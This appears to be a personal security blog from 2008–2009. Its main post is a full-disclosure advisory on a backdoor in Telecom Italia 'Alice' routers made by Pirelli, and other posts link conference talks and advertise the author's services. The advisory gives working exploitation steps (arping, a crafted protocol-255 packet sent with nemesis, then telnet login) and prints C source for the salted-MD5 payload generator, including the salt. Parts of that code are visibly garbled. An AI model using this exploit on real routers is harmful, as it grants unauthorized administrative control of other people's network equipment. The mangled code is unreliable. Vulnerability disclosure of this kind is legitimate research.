Hack In The Box 2008 video published

2009-01-24T05:41:00.000-08:00

You can find video of the conference in Malaysia at

http://thepiratebay.org/torrent/4654588/HITBSecConf2008_-_Malaysia_Videos___Day_1

it's a big big torrent with a lot of single videos inside.
The one dealing with my Pirelli modem backdoor disclosure is of Roberto Preatoni (D1T2 day 1 track 2). You can download it as a single video (discarding the others) from your torrent client.

Bye
saxdax

The Pirelli backdoor unlock exploit at the prestigious Hack In The Box 2008 conference

2009-01-19T09:07:00.000-08:00

Pirelli modems backdoor full disclosure deserved a slide at HITB 2008 in Malaysia by Roberto Preatoni.
The whole document with slides is available at

D1T2 - Roberto Preatoni - Time for a Free Hardware Foundation.pdf

The matter is the trend to bring the analysis at a lower level than software, as we did with modems.

Another interesting Article at HITB dealing with the same topic is the one by Adrian Pastor. You can find it here

D2T2 - Adrian Pastor - Cracking into Embedded Devices and Beyond.pdf

Have a good reading

saxdax

backdoor on Telecom Italia Pirelli modems allows admin access

2009-01-01T11:43:00.000-08:00

##########################################################################

saxdax & drpepperONE

Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface
with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactered by Pirelli based on Broadcom platform.
##########################################################################

Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli
based on Broadcom platform.

Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2 plus]
AG2P-AG3[Alice Gate W2+]/AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi]

Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected.

Platforms: Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset.

Vulnerability: enable telnet/ftp/tftp and web-admin from internal lan.

Exploitation: internal network lan, versus Router

Date: 13 Oct 2008

Authors: saxdax & drpepperONE

e-mail: saxdax2@gmail.com drpepppperone@gmail.com

Risk: medium>low

###################################################################

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix
###################################################################

===============
1) Introduction
===============
Telecom Italia is the most important Italian ISP offering an ADSL service named "Alice".
Telecom Italia rent out with "Alice Adsl" service, different CPE Modem/Router among which
the affected ones.
The interface to configure these modems are made extremily poor by the provider to ensure
more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages from the web interface.
http://www.telecomitalia.com/
http://adsl.alice.it/
######################################################################

================
2) Vulnerability
================
An attacker can activate and get unauthorized access to the routers administration
interface and telnet/ftp/tftp services from internal network.
Every user in the LAN (or Wireless LAN) can nevertheless have access to the routers
administration interface and telnet/ftp/tftp!
If an attacker can get access to the administrator interface and login, he has full control
over the routers configuration. Via telnet the user has a real remote shell to control and
analize the router.
#################################################################

==============
3) The Exploit
==============
To enable telnet/ftp/tftp and web-admin interface it is necessary send a special
IP packet to router specific ip 192.168.1.1.
This works only from internal LAN where an attacker have and ip like 192.168.1.XX.
The ip packet send to router must have the following feature:
1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router)
2)Payload size 8 byte
3)The payload are the first 8 byte of a salted md5 of the mac address of device br0
4)br0 in these modems has the same mac of eth0
When the modem receives the packet all services will be enabled.

Example:

From a GNU/LINUX distrib:
1)Retrieve br0 maccaddress:
arping -I eth0 -c 2 192.168.1.1
ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)

2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte long file with the mac address.
run the application below and copy the output hash.
http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html
3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file (with the tool you like)
i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

4)Telnet to router :
telnet 192.168.1.1
BCM96348 ADSL Router
Login: admin
Password:

#################################################################

===========
4) The Code
===========

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte
hash to use as the paylod of the ip packet */
/* the mac must be in an hex
file and has to be passed as argument to the program */
#include

#include
#include

#include "md5.h"

/*
* RFC 1321 compliant MD5
implementation
*
* Copyright (C) 2001-2003 Christophe Devine
*
*
This program is free software; you can redistribute it and/or modify
* it
under the terms of the GNU General Public License as published by
* the Free
Software Foundation; either version 2 of the License, or
* (at your option)
any later version.
*
* This program is distributed in the hope that it
will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty
of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU
General Public License for more details.
*
* You should have received a
copy of the GNU General Public License
* along with this program; if not,
write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330,
Boston, MA 02111-1307 USA
*/

#define GET_UINT32(n,b,i)
\
{ \
(n) = ( (uint32) (b)[(i) ] ) \
( (uint32) (b)[(i) + 1] <<>> 8 ); \
(b)[(i) +
2] = (uint8) ( (n) >> 16 ); \
(b)[(i) + 3] = (uint8) ( (n) >> 24
); \
}
void md5_starts( md5_context *ctx )
{
ctx->total[0] =
0;
ctx->total[1] = 0;
ctx->state[0] =
0x67452301;
ctx->state[1] = 0xEFCDAB89;
ctx->state[2] =
0x98BADCFE;
ctx->state[3] = 0x10325476;
}
void md5_process(
md5_context *ctx, uint8 data[64] )
{
uint32 X[16], A, B, C,
D;
GET_UINT32( X[0], data, 0 );
GET_UINT32( X[1], data, 4
);
GET_UINT32( X[2], data, 8 );
GET_UINT32( X[3], data, 12
);
GET_UINT32( X[4], data, 16 );
GET_UINT32( X[5], data, 20
);
GET_UINT32( X[6], data, 24 );
GET_UINT32( X[7], data, 28
);
GET_UINT32( X[8], data, 32 );
GET_UINT32( X[9], data, 36
);
GET_UINT32( X[10], data, 40 );
GET_UINT32( X[11], data, 44
);
GET_UINT32( X[12], data, 48 );
GET_UINT32( X[13], data, 52
);
GET_UINT32( X[14], data, 56 );
GET_UINT32( X[15], data, 60
);
#define S(x,n) ((x <<>> (32 -
n)))
#define P(a,b,c,d,k,s,t) \
{ \
a += F(b,c,d) + X[k] + t; a =
S(a,s) + b; \
}
A = ctx->state[0];
B = ctx->state[1];
C =
ctx->state[2];
D = ctx->state[3];
#define F(x,y,z) (z ^ (x & (y
^ z)))
P( A, B, C, D, 0, 7, 0xD76AA478 );
P( D, A, B, C, 1, 12, 0xE8C7B756
);
P( C, D, A, B, 2, 17, 0x242070DB );
P( B, C, D, A, 3, 22, 0xC1BDCEEE
);
P( A, B, C, D, 4, 7, 0xF57C0FAF );
P( D, A, B, C, 5, 12, 0x4787C62A
);
P( C, D, A, B, 6, 17, 0xA8304613 );
P( B, C, D, A, 7, 22, 0xFD469501
);
P( A, B, C, D, 8, 7, 0x698098D8 );
P( D, A, B, C, 9, 12, 0x8B44F7AF
);
P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
P( B, C, D, A, 11, 22, 0x895CD7BE
);
P( A, B, C, D, 12, 7, 0x6B901122 );
P( D, A, B, C, 13, 12, 0xFD987193
);
P( C, D, A, B, 14, 17, 0xA679438E );
P( B, C, D, A, 15, 22, 0x49B40821
);
#undef F
#define F(x,y,z) (y ^ (z & (x ^ y)))
P( A, B, C, D, 1,
5, 0xF61E2562 );
P( D, A, B, C, 6, 9, 0xC040B340 );
P( C, D, A, B, 11, 14,
0x265E5A51 );
P( B, C, D, A, 0, 20, 0xE9B6C7AA );
P( A, B, C, D, 5, 5,
0xD62F105D );
P( D, A, B, C, 10, 9, 0x02441453 );
P( C, D, A, B, 15, 14,
0xD8A1E681 );
P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
P( A, B, C, D, 9, 5,
0x21E1CDE6 );
P( D, A, B, C, 14, 9, 0xC33707D6 );
P( C, D, A, B, 3, 14,
0xF4D50D87 );
P( B, C, D, A, 8, 20, 0x455A14ED );
P( A, B, C, D, 13, 5,
0xA9E3E905 );
P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
P( C, D, A, B, 7, 14,
0x676F02D9 );
P( B, C, D, A, 12, 20, 0x8D2A4C8A );
#undef F
#define
F(x,y,z) (x ^ y ^ z)
P( A, B, C, D, 5, 4, 0xFFFA3942 );
P( D, A, B, C, 8,
11, 0x8771F681 );
P( C, D, A, B, 11, 16, 0x6D9D6122 );
P( B, C, D, A, 14,
23, 0xFDE5380C );
P( A, B, C, D, 1, 4, 0xA4BEEA44 );
P( D, A, B, C, 4, 11,
0x4BDECFA9 );
P( C, D, A, B, 7, 16, 0xF6BB4B60 );
P( B, C, D, A, 10, 23,
0xBEBFBC70 );
P( A, B, C, D, 13, 4, 0x289B7EC6 );
P( D, A, B, C, 0, 11,
0xEAA127FA );
P( C, D, A, B, 3, 16, 0xD4EF3085 );
P( B, C, D, A, 6, 23,
0x04881D05 );
P( A, B, C, D, 9, 4, 0xD9D4D039 );
P( D, A, B, C, 12, 11,
0xE6DB99E5 );
P( C, D, A, B, 15, 16, 0x1FA27CF8 );
P( B, C, D, A, 2, 23,
0xC4AC5665 );
#undef F
#define F(x,y,z) (y ^ (x ~z))
P( A, B, C, D,
0, 6, 0xF4292244 );
P( D, A, B, C, 7, 10, 0x432AFF97 );
P( C, D, A, B, 14,
15, 0xAB9423A7 );
P( B, C, D, A, 5, 21, 0xFC93A039 );
P( A, B, C, D, 12,
6, 0x655B59C3 );
P( D, A, B, C, 3, 10, 0x8F0CCC92 );
P( C, D, A, B, 10,
15, 0xFFEFF47D );
P( B, C, D, A, 1, 21, 0x85845DD1 );
P( A, B, C, D, 8, 6,
0x6FA87E4F );
P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
P( C, D, A, B, 6, 15,
0xA3014314 );
P( B, C, D, A, 13, 21, 0x4E0811A1 );
P( A, B, C, D, 4, 6,
0xF7537E82 );
P( D, A, B, C, 11, 10, 0xBD3AF235 );
P( C, D, A, B, 2, 15,
0x2AD7D2BB );
P( B, C, D, A, 9, 21, 0xEB86D391 );
#undef
F
ctx->state[0] += A;
ctx->state[1] += B;
ctx->state[2] +=
C;
ctx->state[3] += D;
}
void md5_update( md5_context *ctx, uint8
*input, uint32 length )
{
uint32 left, fill;
if( ! length )
return;
left = ctx->total[0] & 0x3F;
fill = 64 -
left;
ctx->total[0] += length;
ctx->total[0] &=
0xFFFFFFFF;
if( ctx->total[0] <>total[1]++;
if(
left && length >= fill )
{
memcpy( (void *) (ctx->buffer +
left),
(void *) input, fill );
md5_process( ctx, ctx->buffer
);
length -= fill;
input += fill;
left = 0;
}
while( length >=
64 )
{
md5_process( ctx, input );
length -= 64;
input +=
64;
}
if( length )
{
memcpy( (void *) (ctx->buffer +
left),
(void *) input, length );
}
}
static uint8 md5_padding[64]
=
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};
void md5_finish(
md5_context *ctx, uint8 digest[16] )
{
uint32 last, padn;
uint32 high,
low;
uint8 msglen[8];
high = ( ctx->total[0] >> 29 )
(
ctx->total[1] << low =" (">total[0] << i="0;i<8;i++)" last =" ctx-">total[0] & 0x3F;
padn = ( last <>state[0], digest, 0 );
PUT_UINT32(
ctx->state[1], digest, 4 );
PUT_UINT32( ctx->state[2], digest, 8
);
PUT_UINT32( ctx->state[3], digest, 12 );
}
//#ifdef
TEST

/*
* those are the standard RFC 1321 test
vectors
*/
static char *msg[] =
{
"",
"a",
"abc",
"message
digest",
"abcdefghijklmnopqrstuvwxyz",
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
"12345678901234567890123456789012345678901234567890123456789012"
\
"345678901234567890"
};
static char *val[]
=
{
"d41d8cd98f00b204e9800998ecf8427e",
"0cc175b9c0f1b6a831c399e269772661",
"900150983cd24fb0d6963f7d28e17f72",
"f96b697d7cb7938d525a2f31aaf161d0",
"c3fcd3d76192e4007dfb496cca67e13b",
"d174ab98d277d9f5a5611c2c9f419d9f",
"57edf4a22be3c955ac49da2e2107b67a"
};
static
char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11,
0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};
int main(
int argc, char *argv[] )
{
FILE *f;
int i, j;
char
output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char
md5sum[16];
unsigned char salt[20];
printf(
"****************************\n");
printf( "Alice BackDoor hash creator
\n");
printf( "by saxdax and drPepperOne \n");
printf(
"****************************\n\n");
if( argc < f =" fopen(" i =" fread("> 0 )
{
md5_update( &ctx, buf, i );
}
memcpy(salt,
saltOrig, 20);
md5_update( &ctx, salt, 20 );
md5_finish( &ctx,
md5sum );
printf("Payload is: ");
for( j = 0; j <>

###################################################################
======
5) Fix
======

Atcualy at 13 Oct 2008 NO FIX available
###################################################################

saxdax

2008-12-20T17:14:00.000-08:00

This blog borns to publish infos and guides about my studies, researches and results in IT Security world.
If you need support (professional or not) with the matters listed below simply contact me at saxdax2@gmail.com.

Reverse engineering: x86, MIPS, ARM, ELF32
Cryptanalysis: standard algorithms, custom algorithms
Wardriving: WEP, WPA (telecom italia WPA Alice analysis)
Penetration testing: Web sites (tests against SQL Injection and Cross Site Scripting)
Information disclosure: how to find any kind of infos on the web…
Programming: everything…
Network Traffic Anaysis: knowledge of every level of the ISO/OSI stack model.

saxdax